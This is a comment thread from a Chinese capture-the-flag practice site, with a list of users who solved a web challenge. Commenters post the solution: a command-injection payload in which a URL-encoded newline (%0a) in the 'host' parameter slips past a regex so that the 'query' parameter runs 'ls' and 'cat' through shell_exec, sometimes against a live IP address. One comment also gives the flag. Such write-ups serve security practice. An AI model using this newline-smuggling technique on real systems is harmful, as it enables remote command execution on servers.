评分(0)
暂无评分
解题动态
Jeffers0n 攻破了该题 8小时前
zhaoyu 攻破了该题 8小时前
wd294175149 攻破了该题 4天前
小坑西1 攻破了该题 4天前
ifnoif 攻破了该题 5天前
dabing 攻破了该题 8天前
montarius 攻破了该题 8天前
zxingxing121 攻破了该题 10天前
fengyuqi 攻破了该题 10天前
zachary 攻破了该题 12天前
quiver 攻破了该题 12天前
lihecaisi 攻破了该题 13天前
x1anyu 攻破了该题 14天前
19002024187 攻破了该题 15天前
19581700609 攻破了该题 17天前
Ru1n 攻破了该题 17天前
消除bug的小章 攻破了该题 17天前
yaoyiyi 攻破了该题 17天前
bugku111rao 攻破了该题 18天前
评论
000ooo 26天前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
cyffk 24天前
举报
为什么%不会被过滤?
Zhumeng 27天前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 2月前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 3月前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 4月前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
Tao23 6月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 7月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 8月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 8月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
.⎛⎝•̀ω•́⎠⎞. 10月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕